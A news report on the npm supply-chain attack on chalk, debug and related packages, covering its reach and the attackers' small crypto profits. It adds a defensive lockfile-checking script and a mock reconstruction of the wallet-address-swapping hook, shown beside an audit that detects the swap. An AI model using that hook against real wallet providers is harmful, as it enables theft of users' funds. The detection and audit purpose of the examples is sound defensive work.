The largest attack in the history of the npm ecosystem affected about 10% of cloud environments. However, experts concluded that the attackers made practically nothing from this breach.
The attack occurred earlier this week and affected around 20 of the most popular npm packages, which collectively account for more than 2.6 billion weekly downloads (including libraries such as chalk, debug, and ansi-styles).
The breach began with a phishing attack that captured the npm credentials of maintainer Josh Junon, also known as Qix. With that access, the attackers published new versions of his popular packages containing hidden malicious code that stole cryptocurrency by redirecting victims' transfers to attacker-controlled addresses.
As we noted earlier, the community quickly detected the attack, and all malicious packages were removed within a matter of hours.
As analysts at Wiz now report, at least one of the compromised packages, which are foundational to practically every JavaScript and Node.js project, is present in 99% of cloud environments.

In the few hours the malicious versions were available for download, they reached roughly 10% of cloud environments. These figures are based on data from the cloud environments of Wiz's own customers, supplemented with open-source information.
“During the brief two-hour window when the malicious versions were available on npm, the malicious code successfully made its way into one in ten cloud environments. This demonstrates how quickly malicious code can spread in supply-chain attacks like this,” the researchers write.
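The first question most teams asked that week was whether any of their builds had resolved one of the poisoned versions. The following is an added example, not code from the page, from Wiz, or from the npm project: a Node script that walks a package-lock.json against an advisory list, handling both the flat "packages" map of lockfile v2/v3 and the nested "dependencies" tree of v1. The package names come from the article; the version numbers in ADVISORY are placeholders to be replaced with the advisory's own list, and both lockfiles are constructed for the demo.

```javascript
// Added example (not from the page, Wiz, or npm): list every install in a
// package-lock.json whose name/version is on an advisory list. The versions
// are placeholders and the lockfiles are constructed; substitute real advisory data.

const ADVISORY = {                        // package -> versions to flag (placeholders)
  "chalk":       ["1.2.3"],
  "debug":       ["4.5.6"],
  "ansi-styles": ["7.8.9"],
};

function isFlagged(name, version, advisory) {
  return (advisory[name] || []).includes(version);
}

// lockfileVersion 2 and 3: flat "packages" map keyed by install path, e.g.
// "node_modules/a/node_modules/debug". The key "" is the project itself.
function scanPackagesMap(packages, advisory, hits) {
  const marker = "node_modules/";
  for (const [path, meta] of Object.entries(packages || {})) {
    if (path === "" || !meta.version) continue;          // root entry or a workspace link
    const name = meta.name || path.slice(path.lastIndexOf(marker) + marker.length);
    if (isFlagged(name, meta.version, advisory)) hits.push({ path, name, version: meta.version });
  }
}

// lockfileVersion 1: nested "dependencies" tree, so recurse and build the path.
function scanDependencyTree(deps, advisory, hits, prefix = "") {
  for (const [name, meta] of Object.entries(deps || {})) {
    const path = `${prefix}node_modules/${name}`;
    if (isFlagged(name, meta.version, advisory)) hits.push({ path, name, version: meta.version });
    scanDependencyTree(meta.dependencies, advisory, hits, `${path}/`);
  }
}

function findFlaggedInstalls(lock, advisory = ADVISORY) {
  const hits = [];
  if (lock.packages) scanPackagesMap(lock.packages, advisory, hits);   // v2 carries both; prefer "packages"
  else scanDependencyTree(lock.dependencies, advisory, hits);
  return hits;
}

// For a real project: findFlaggedInstalls(loadLock("package-lock.json"))
function loadLock(file) {
  return JSON.parse(require("node:fs").readFileSync(file, "utf8"));
}

// Constructed lockfiles for the demo.
const SAMPLE_LOCK_V3 = {
  name: "demo-app", lockfileVersion: 3,
  packages: {
    "": { name: "demo-app", version: "1.0.0" },
    "node_modules/chalk": { version: "1.2.3" },                        // flagged
    "node_modules/debug": { version: "4.0.0" },                        // not flagged
    "node_modules/some-tool": { version: "2.0.0" },
    "node_modules/some-tool/node_modules/debug": { version: "4.5.6" }, // flagged, nested copy
  },
};
const SAMPLE_LOCK_V1 = {
  lockfileVersion: 1,
  dependencies: {
    chalk: { version: "9.9.9", dependencies: { "ansi-styles": { version: "7.8.9" } } }, // nested hit
  },
};

for (const lock of [SAMPLE_LOCK_V3, SAMPLE_LOCK_V1]) {
  console.log(`lockfileVersion ${lock.lockfileVersion}:`, findFlaggedInstalls(lock));
}
```

A lockfile hit tells you what a reproducible install would fetch; CI jobs that ran an install without a lockfile during the two-hour window have to be checked against their build logs instead.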
Although this attack caused noticeable disruptions, and companies spent considerable time on recovery and audits, the security impact turned out to be negligible — as was the attackers’ profit.
Earlier this week, researchers suggested the attack didn’t go quite as planned and that the hackers made virtually no “earnings.” According to an analysis by Security Alliance, the injected malicious code targeted the browser environment and intercepted Ethereum and Solana signing requests, substituting cryptocurrency wallet addresses with ones controlled by the attackers.
It was precisely the attackers' choice of a plain crypto-clipper, a payload that does nothing but swap wallet addresses in transactions, that spared the affected companies more serious consequences. After all, the intruders could have used the same foothold to implant reverse shells, move laterally within victims' networks, or deploy ransomware and destructive wipers.
As Security Alliance explained, the malicious code checked for the presence of window.ethereum and, if found, hooked the core Ethereum transaction functions. Calls to approve, permit, transfer, and transferFrom were silently redirected to the wallet 0xFc4a4858bafef54D1b1d7697bfb5c52F4c166976, and plain ETH transfers (a transaction carrying a value but no calldata) had their destination rewritten as well. In the case of Solana, the malware replaced recipient addresses with an invalid string starting with "1911…", which broke those transfers entirely.
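To make that mechanism concrete, here is an added example, not code from the compromised packages or from Security Alliance's analysis: a mock stand-in for window.ethereum, a wrapper that rewrites addresses the way the paragraph describes, and a round-trip audit that a dApp team can run against its own bundle in a test harness to catch any such rewrite. The addresses, the token, the synchronous mock provider and the selector table (standard ERC-20 signatures plus the EIP-2612 form of permit) are all constructed assumptions; a real provider's request() returns a Promise, so the same wrapper would simply be awaited.

```javascript
// Added example, not code from the compromised packages or from Security Alliance.
// Mock of the window.ethereum hooking the article describes, beside a round-trip
// audit that detects the address swap. All addresses and the token are constructed.

const ATTACKER = "0x1111111111111111111111111111111111111111"; // placeholder, not a real wallet
const USER     = "0x2222222222222222222222222222222222222222"; // the victim (constructed)
const FRIEND   = "0x3333333333333333333333333333333333333333"; // intended recipient (constructed)
const TOKEN    = "0x4444444444444444444444444444444444444444"; // some ERC-20 contract (constructed)

// 4-byte selectors of the calls named in the article, and which argument holds the
// address worth swapping (recipient or spender). Assumes standard ERC-20 signatures
// and the EIP-2612 variant of permit.
const SELECTORS = {
  "0xa9059cbb": { name: "transfer",     addrArgs: [0] }, // transfer(address to, uint256 amount)
  "0x095ea7b3": { name: "approve",      addrArgs: [0] }, // approve(address spender, uint256 amount)
  "0x23b872dd": { name: "transferFrom", addrArgs: [1] }, // transferFrom(address from, address to, uint256 amount)
  "0xd505accf": { name: "permit",       addrArgs: [1] }, // permit(address owner, address spender, uint256 value, ...)
};

// One 32-byte ABI word: left-padded hex of an address or a uint256.
const word = (v) =>
  (typeof v === "bigint" ? v.toString(16) : v.replace(/^0x/, "")).toLowerCase().padStart(64, "0");

// Minimal ABI encoding for calls whose arguments are only addresses / uint256.
function encodeCall(selector, args) {
  return selector + args.map(word).join("");
}

// Read the address stored in 32-byte argument `idx` of calldata `data`.
function decodeAddressArg(data, idx) {
  const start = 10 + idx * 64;            // "0x" + 8-char selector, then 64-char words
  return "0x" + data.slice(start + 24, start + 64);
}

// Stand-in for window.ethereum: records every request it receives. Kept
// synchronous for the demo; a real provider returns a Promise.
function makeLoggingProvider() {
  const log = [];
  const provider = {
    request(args) {
      log.push(JSON.parse(JSON.stringify(args)));
      return "0x" + "ab".repeat(32);      // fake transaction hash
    },
  };
  return { provider, log };
}

// The hook: wrap provider.request and, for eth_sendTransaction, rewrite the address
// argument of a known ERC-20 call, or the `to` of a plain ETH transfer (value set,
// no calldata). Every other request passes through untouched, so nothing looks broken.
function installClipper(provider, attacker) {
  const original = provider.request.bind(provider);
  provider.request = (args) => {
    if (args.method !== "eth_sendTransaction") return original(args);
    const tx = { ...args.params[0] };
    const data = (tx.data || "0x").toLowerCase();
    const sel = SELECTORS[data.slice(0, 10)];
    if (sel) {
      let patched = data;
      for (const i of sel.addrArgs) {
        const start = 10 + i * 64;
        patched = patched.slice(0, start) + word(attacker) + patched.slice(start + 64);
      }
      tx.data = patched;
    } else if (data === "0x" && tx.value && tx.value !== "0x0") {
      tx.to = attacker;
    }
    return original({ ...args, params: [tx] });
  };
}

// Round-trip audit: compare the transaction the dApp built with what reached the
// provider. A changed `to` or a changed address argument is a finding.
function findSwappedAddresses(sent, received) {
  const findings = [];
  if ((sent.to || "").toLowerCase() !== (received.to || "").toLowerCase()) {
    findings.push({ field: "to", expected: sent.to, got: received.to });
  }
  const sel = SELECTORS[(sent.data || "0x").slice(0, 10).toLowerCase()];
  if (sel) {
    for (const i of sel.addrArgs) {
      const expected = decodeAddressArg(sent.data, i);
      const got = decodeAddressArg(received.data || "0x", i);
      if (expected !== got) findings.push({ field: `${sel.name} arg ${i}`, expected, got });
    }
  }
  return findings;
}

// Push two representative transactions through a clean provider, or one with the
// clipper installed, and return the findings for each transaction.
function runAudit(tampered) {
  const { provider, log } = makeLoggingProvider();
  if (tampered) installClipper(provider, ATTACKER);
  const txs = [
    { from: USER, to: TOKEN, data: encodeCall("0xa9059cbb", [FRIEND, 1000n]) }, // ERC-20 transfer to FRIEND
    { from: USER, to: FRIEND, value: "0xde0b6b3a7640000", data: "0x" },        // 1 ETH, no calldata
  ];
  return txs.map((tx) => {
    provider.request({ method: "eth_sendTransaction", params: [tx] });
    return findSwappedAddresses(tx, log[log.length - 1].params[0]);
  });
}

console.log("clean:", JSON.stringify(runAudit(false)));
console.log("hooked:", JSON.stringify(runAudit(true)));
```

The audit catches the swap only because it sees both ends, the transaction the dApp built and the one that arrived. A user on a live page has no such second view, which is why the wallet's confirmation screen, showing the rewritten recipient, was the last place the substitution could be noticed.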
As noted on the day of the attack, it appears the attackers were not substituting their own wallet addresses but those of Uniswap and other swap contracts in place of the real recipients' addresses. As a result, the hackers "made" anywhere from a few cents to $50, according to researchers' estimates.

According to experts at Socket, the same hackers later compromised the DuckDB maintainer’s account and the project’s packages, injecting the same crypto-stealing code into them.
But even this breach, in which the attackers did not even alter the payload, brought them only $429 in Ethereum, $46 in Solana, and small amounts in BTC, Tron, BCH, and LTC, for a total of $600.